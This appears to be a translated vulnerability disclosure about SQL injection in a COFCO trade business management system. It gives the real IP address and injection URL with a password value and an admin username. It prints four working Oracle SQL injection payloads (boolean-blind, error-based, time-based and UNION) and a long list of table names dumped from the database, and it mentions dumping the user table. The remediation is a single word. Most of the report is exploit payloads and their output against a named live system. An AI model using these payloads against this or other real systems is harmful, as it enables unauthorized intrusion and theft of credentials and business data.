A website in COFCO has the SQL Injection Vulnerability (more than 800 tables can be retrieved from the database)

A website in COFCO has the SQL Injection Vulnerability (more than 800 tables can be retrieved from the database)

COFCO Trade Business Management System: http: // 219.143.252.178/. The SQL injection vulnerability exists. Through injection, more than 800 tables can be obtained from the database, attackers can obtain a large amount of sensitive information such as users and passwords.

Injection point: http: // 219.143.252.178/verifiADCode_do.jsp? Pwd = 135791 & username = admin

The injection point is username.
 

Parameter: username (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: pwd=135791&username=admin' AND 3189=3189 AND 'xpOs'='xpOs    Type: error-based    Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)    Payload: pwd=135791&username=admin' AND 3287=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(120)||CHR(118)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3287=3287) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113))) AND 'oDSL'='oDSL    Type: AND/OR time-based blind    Title: Oracle AND time-based blind (heavy query)    Payload: pwd=135791&username=admin' AND 2674=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'WiyK'='WiyK    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: pwd=135791&username=admin' UNION ALL SELECT CHR(113)||CHR(120)||CHR(118)||CHR(122)||CHR(113)||CHR(89)||CHR(113)||CHR(98)||CHR(116)||CHR(80)||CHR(88)||CHR(86)||CHR(107)||CHR(81)||CHR(66)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113),NULL FROM DUAL--

You can view database information through injection.
 

The current database is TRADE_BUSINESS. You can run more than 800 tables.
 

 

 

+-------------------------------+| BG_REPORTPACT＿SUB1            || BG_REPORTPACT＿SUB2            || BG_REPORTPACT＿SUB3            || BG_REPORTPACT＿SUB4            || LMB2015-6-3_JOB               || ZJ_AFFIRM＿SUB                 || APPLOG                        || AQ_CHECKLOG                   || BANK_EVEN_NO                  || BB_CONTROL                    || BB_CONTROL_DESC               || BB_CONTROL_LIST               || BB_CONTROL_PART_DATE          || BB_CONTROL_WEEK_DATE          || BB_DAILY_FDYK_1               || BB_DAILY_FDYK_2               || BB_DAILY_FDYK_YEAR_1          || BB_DAILY_FDYK_YEAR_2          || BB_DAILY_GXC_LEADER           || BB_DAILY_GXC_LEADER_1         || BB_DAILY_GXC_LEADER_2         || BB_DAILY_GXC_LEADER_CK        || BB_DAILY_GXC_LEADER_GROUP_01  || BB_DAILY_GXC_LEADER_JZCK      || BB_DAILY_GXC_LEADER_RK        || BB_DAILY_GXC_LEADER_SH        || BB_DAILY_GXC_LEADER_YEAR      || BB_DAILY_GXC_LEADER_YEAR_1    || BB_DAILY_GXC_LEADER_YEAR_2    || BB_DAILY_GXC_LEADER_Y_CK      || BB_DAILY_GXC_LEADER_Y_JZCK    || BB_DAILY_GXC_LEADER_Y_RK      || BB_DAILY_GXC_LEADER_Y_SH      || BB_DAILY_GXC_LEAD_Y_GROUP_01  || BB_DAILY_GXC_WORK             || BB_DAILY_GXC_WORK_3           || BB_DAILY_GXC_WORK_4           || BB_DAILY_GXC_WORK_CK          || BB_DAILY_GXC_WORK_GROUP_01    || BB_DAILY_GXC_WORK_JZCK        || BB_DAILY_GXC_WORK_RK          || BB_DAILY_GXC_WORK_SH          || BB_DAILY_GXC_WORK_YEAR        || BB_DAILY_GXC_WORK_YEAR_3      || BB_DAILY_GXC_WORK_YEAR_4      || BB_DAILY_GXC_WORK_Y_ALL_ADD   || BB_DAILY_GXC_WORK_Y_CK        || BB_DAILY_GXC_WORK_Y_GROUP_01  || BB_DAILY_GXC_WORK_Y_JZCK      || BB_DAILY_GXC_WORK_Y_JZCK_ADD  || BB_DAILY_GXC_WORK_Y_RK        || BB_DAILY_GXC_WORK_Y_SH        || BB_DAILY_JTC                  || BB_DAILY_JTC_1                || BB_DAILY_JTC_2                || BB_DAILY_JTC_3                || BB_DAILY_JTC_4                || BB_DAILY_JTC_GR               || BB_DAILY_JTC_GR_ADD           || BB_DAILY_JTC_XS               || BB_DAILY_JTC_XS_ADD           || BB_DAILY_JTC_YEAR             || BB_DAILY_JTC_YEAR_1           || BB_DAILY_JTC_YEAR_2           || BB_DAILY_JTC_YEAR_3           || BB_DAILY_JTC_YEAR_4           || BB_DAILY_JTC_YEAR_ADD         || BB_DAILY_JTC_Y_GR             || BB_DAILY_JTC_Y_GR_ADD         || BB_DAILY_JTC_Y_XS             |。。。。| ZJ_PAYMENT_FLOW_LOG           || ZJ_PAYMENT_FLOW_LOG_DEL       || ZJ_PAYMENT_ROWS               || ZJ_PAYMENT_SUB                || ZJ_PAYMENT_SUB1               || ZJ_PAYMENT_SUBFLOW            || ZJ_PLANAPPROVAL               || ZJ_PLANAPPROVAL_LOG           || ZJ_PLANAPPROVAL_SUB1          || ZJ_PLANAPPROVAL_SUB2          || ZJ_REFDETAILS                 || ZJ_REFUND                     || ZJ_REFUNDQUEREN               || ZJ_REFUNDQUEREN_SUB           || ZJ_RETURN                     || ZJ_RETURN_SUB                 || ZJ_TEMPORARY                  || ZJ_TEMPORARY_LOG              || ZJ_TEMPORARY_SUB              || ZJ_TEMPORARY_SUB2             || ZJ_TEMPORARY_SUB3             || ZJ_TRANSFERACCOUNT            || ZJ_UNPAIREDSETTLEMENT         || ZJ_UNPAIREDSETTLEMENT_SUB     || ZJ_ZHUANZHANGSQ               || ZJ_ZHUANZHANG_SUB1            || ZJ_ZHUANZHANG_SUB2            || CBSHIP                        || CK_AMOUNT                     || KH_CUSTOMTMP                  |+-------------------------------+

Run the OU_USER table for verification.
 

 

Solution:

Filter